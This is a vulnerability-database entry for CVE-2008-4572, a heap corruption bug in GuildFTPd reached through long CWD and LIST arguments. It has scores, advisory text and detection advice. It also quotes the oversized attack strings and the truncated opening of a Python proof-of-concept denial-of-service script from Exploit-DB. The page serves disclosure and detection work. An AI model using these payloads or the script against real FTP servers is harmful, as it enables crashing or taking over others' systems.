CVE-2008-4572
published 2008-10-15CVE-2008-4572: GuildFTPd 0.999.14, and possibly other versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long…
PriorityP261critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
60.69%
99.0th percentile
GuildFTPd 0.999.14, and possibly other versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long arguments to the CWD and LIST commands, which triggers heap corruption related to an improper free call, and possibly triggering a heap-based buffer overflow.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| guildftpd | guildftpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcwd /././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././↗
commandlist XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX↗
- →Detect exploitation attempts by monitoring FTP traffic for a CWD command with an abnormally long argument consisting of repeated '/.' patterns (124 repetitions = 248 chars) followed by a LIST command with a long argument (~100 chars). ↗
- →The attack requires a valid FTP login (including anonymous) before issuing the malicious CWD and LIST commands; alert on authenticated FTP sessions sending oversized CWD or LIST arguments. ↗
- →The vulnerability triggers heap corruption via an improper free() call, manifesting as overwritten registers ECX and EDI; crash/DoS of the GuildFTPd process is the observable outcome. ↗
- →Target process is GuildFTPd versions 0.999.8.11 and 0.999.14 on Windows; monitor for unexpected termination of the GuildFTPd service process following receipt of long CWD/LIST commands. ↗
- ·Anonymous FTP access is sufficient to exploit this vulnerability; disabling anonymous login does not fully mitigate the risk as any valid credential works. ↗
- ·Both GuildFTPd 0.999.8.11 and 0.999.14 are confirmed vulnerable; version checks should cover both branches. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2ppc-v4fh-g52h: GuildFTPd 0
ghsa_unreviewed·2022-05-02
CVE-2008-4572 [HIGH] CWE-119 GHSA-2ppc-v4fh-g52h: GuildFTPd 0
GuildFTPd 0.999.14, and possibly other versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long arguments to the CWD and LIST commands, which triggers heap corruption related to an improper free call, and possibly triggering a heap-based buffer overflow.
VMware
Updated service console patches.
vendor_vmware·2008-01-07·CVSS 1.2
CVE-2007-3108 [LOW] Updated service console patches.
VMSA-2008-0001: Updated service console patches.
Updated service console patches. VMware Security Advisory VMware Security Advisory Advisory ID: VMware Security Advisory Synopsis: Updated service console patches. VMware Security Advisory Issue date: VMware Security Advisory Updated on:
CVEs: CVE-2007-3108, CVE-2007-4572, CVE-2007-5116, CVE-2007-5135, CVE-2007-5191, CVE-2007-5360, CVE-2007-5398
No detection rules found.
Exploit-DB
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service
exploitdb·2008-10-12
CVE-2008-4572 GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service
---
# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
# GuildFTPd URL - http://www.guildftpd.com
# cwd/list heap corruption
# overwrite registers in free(): ecx, edi
#
# (x)dmnt 2008
# feel free to do shellcode
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/."*124
evil_dir = "X"*100
def help_info():
print ("Usage: guildd0s \n")
print ("Note: anonymous is enought\n")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\n" %username)
r=sock.recv(1024)
sock.send("pass %s\n" %passwd)
r=sock.
Metasploit
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
metasploit
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST.
No writeups or analysis indexed.
http://secunia.com/advisories/32218http://securityreason.com/securityalert/4422http://www.securityfocus.com/bid/31729http://www.vupen.com/english/advisories/2008/2794https://exchange.xforce.ibmcloud.com/vulnerabilities/45818https://www.exploit-db.com/exploits/6738http://secunia.com/advisories/32218http://securityreason.com/securityalert/4422http://www.securityfocus.com/bid/31729http://www.vupen.com/english/advisories/2008/2794https://exchange.xforce.ibmcloud.com/vulnerabilities/45818https://www.exploit-db.com/exploits/6738
2008-10-15
Published